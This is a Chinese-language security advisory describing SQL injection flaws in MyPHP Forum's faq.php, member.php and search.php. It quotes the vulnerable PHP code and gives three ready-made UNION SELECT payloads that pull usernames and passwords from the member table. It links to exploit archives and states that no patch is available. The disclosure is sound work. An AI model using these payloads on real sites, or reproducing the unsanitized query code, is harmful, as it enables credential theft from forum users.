 |
|
MyPHP Forum是一个易于架设并且易于使用基于MySQL与PHP的论坛。
MyPHP Forum处理用户请求数据时存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击。
MyPHP Forum的faq.php文件没有正确地验证对id参数的输入,member.php文件没有正确验证对member参数的输入,search.php文件没有正确验证对searchtext和searchuser参数的输入,允许攻击者通过注入任意SQL代码控制SQL查询。成功攻击要求禁用了magic_quotes_gpc。
faq.php文件中的漏洞代码:
<?php
//faq.php
[...]
$id = $_GET['id'];
if($action == "view" && !empty($id)) {
$result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- So miss a control :-D
$row = mysql_fetch_array($result);
$row[answer] = postify($row[answer]);
[...]
?>
member.php文件中的漏洞代码:
<?php
//member.php
[...]
if($action == "viewpro") {
$member = $HTTP_GET_VARS['member'];
$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
[...]
?>
search.php文件中的漏洞代码:
if($_POST['submit']) {
$searchtext = $_POST['searchtext'];
$searchuser = $_POST['searchuser'];
if(!strstr($searchtext, '"')) {
$keywords = explode(" ", $searchtext);
for($i = 0; $i < count($keywords); $i++) {
if($sqladdon != "") {
$sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
} else {
$sqladdon .= "p.message LIKE '%$keywords[$i]%'";
}
}
} else {
$phrase = trim(stripslashes(strstr($searchtext, '"')));
$quotesarr = explode('"', $phrase);
$quotes = count($quotesarr);
$phrasecount = $quotes - (count(explode('" "', $phrase)) + 1);
for($i = 0; $i < $quotes; $i++) {
if($i != 0 && $i != $quotes - 1) {
if($phraseoff != "yes") {
$phraselist .= "$quotesarr[$i]|";
$phraseoff = "yes";
} else {
$phraseoff = "no";
}
}
}
$phrasearr = explode("|", $phraselist);
$phrases = count($phrasearr) - 1;
for($i = 0; $i < $phrases; $i++) {
if($sqladdon != "") {
$sqladdon .= " AND p.message LIKE '%$phrasearr[$i]%'";
} else {
$sqladdon .= "p.message LIKE '%$phrasearr[$i]%'";
}
}
$newsearchtxt = trim(str_replace("$phrase", "", stripslashes($searchtext)));
if($newsearchtxt != "") {
$keywords = explode(" ", $newsearchtxt);
}
for($i = 0; $i < count($keywords); $i++) {
if($sqladdon != "") {
$sqladdon .= " AND p.message LIKE '%$keywords[$i]%'";
} else {
$sqladdon .= "p.message LIKE '%$keywords[$i]%'";
}
}
}
if($searchuser != "") {
if($sqladdon != "") {
$sqladdon .= " AND p.author LIKE '%$searchuser%'";
} else {
$sqladdon .= "p.author LIKE '%$searchuser%'";
}
}
if($sqladdon != "" ) {
search_header();
$ttnum = 1; // Now the Vulnerable Query =)
$query = mysql_query("SELECT t.*, f.name AS forum FROM $db_post p, $db_topic t, $db_forum f WHERE $sqladdon AND t.tid=p.tid AND f.fid=t.fid") or die(mysql_error());
<*来源:x0kster (x0kster@gmail.com)
The:Paradox
链接:http://secunia.com/advisories/28280/
http://milw0rm.com/exploits/4831
http://milw0rm.com/exploits/4822
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*"
http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*
http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*
建议:
厂商补丁:
MyPHP.ws
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.myphp.ws/ |
|
|
|
![]() |
|
